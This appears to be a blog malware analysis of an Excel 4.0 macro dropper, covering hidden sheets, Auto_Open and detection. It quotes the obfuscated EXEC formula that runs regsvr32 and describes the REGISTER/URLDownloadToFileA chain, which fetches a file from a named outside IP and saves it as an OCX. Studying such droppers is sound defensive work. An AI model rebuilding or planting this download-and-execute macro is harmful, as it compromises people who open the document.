Excel 4.0 Macro Malware— old feature but can be harmful
This article introduces the functionality of excel 4.0 macro with couple of detection techniques.
The first technique and the most common detection of excel 4.0 macro is the hidden sheet feature. In the below picture we can see the “unhide” option that shows all the hidden sheets:
After we chose the “Unhide” option, we can see all the hidden sheets inside the malware.
Now, let’s take a deeper look on the malicious excel 4.0 macro functionality. The first sheet contains the Auto_Open function as we can see in figure 5. The idea of Auto_Open function is to run automatically your code when Excel starts.
After clicking on the Auto_Open function we are jumping into a sheet called “Tiposa” on cell G1. After a deeper look in G column, we can see the first use of excel 4.0 macro functions that will downloads a malicious file from cell G25.
The REGISTER function will Registers the specified dynamic link library (DLL) or code resource and returns the register ID. You can also specify a custom function name and argument names that will appear in the Paste Function dialog box. link
By cleaning quotes and ampersands inside the REGISTER function we can see clearly all the arguments:
The REGISTER use the URLDownloadToFileA API function to Downloads data from the Internet and saves them to a file on the victim machine. The URLDownloadToFileA is a urlmon.dll function. Let’s list all the arguments of the REGISTER function:
URLMON = which DLL to load.URLDownloadToFileA = which function to call from the chosen DLL.D20 = "JJCCBB" (used to specify data types to call the API).Drwrgdfghfhf = custom name (will call the function with a new custom name "=Drwrgdfghfhf()").D22 = 1 (Category).D23 = 9 (Category).
Now, we will see the use of the custom name function called “Drwrgdfghfhf”. The adversary will download the malware from a malicious server using HTTP protocol.
As we can see here, the malware using some evasion techniques. Let’s clean the quotes and ampersands to see all the arguments:
Drwrgdfghfhf = custom name of the REGISTER function that we saw on figure 6.Tiposa!E21 = "184.108.40.206/".Tiposa1!G11 = random number between 213214234(bottom) and 9776980793567560(top) with the RANDBETWEEN() function.Sheet2!K12 = ".dat".
A little information about the Tiposa!E21, Tiposa1!G11 and Sheet2!K12. This syntax role is to call to a specific cell from a specific sheet inside excel file. For example, the Tiposa1!G11 will go to sheet named “Tiposa1” and will import the content from G11 cell.
The RANDBETWEEN() function will Returns a random integer number between the numbers you specify. A new random integer number is returned every time the worksheet is calculated. link
After concatenating all the arguments, we can see in figure 7 how the malware downloading a DAT file from the malicious server via HTTP protocol and saves the file to “C:\ProgramData\VDscytujyctfjkvu1.ocx” with a new extension (OCX file).
The last part of the excel 4.0 macro is the file execution. The malware will use the EXEC function to run the malicious OCX file.
The EXEC() function will Starts a separate program. Use EXEC to start other programs with which you want to communicate. link
=EXEC(E19&"vr32 C"&":\"&"Pr"&"og"&"ra"&"mD"&"a"&"t"&"a\VDscytujyctfjkvu1.ocx")E19 = T(E20&E21) = "regs"
regsvr32 is a command-line utility in Microsoft Windows and ReactOS for registering and unregistering DLLs and ActiveX controls in the operating system Registry. Wikipedia
OCX file is an ActiveX control. The adversary used this method to register a OCX file with command-line utility called Regsvr32. Now, the malware (OCX file) running on the victim machine.
The excel 4.0 macro is an old feature (XLM 4.0 macro) that was introduced in 1992 by Microsoft. This technique is a different way to execute malicious code through office document. Beware, not only VBA code can compromised your machine.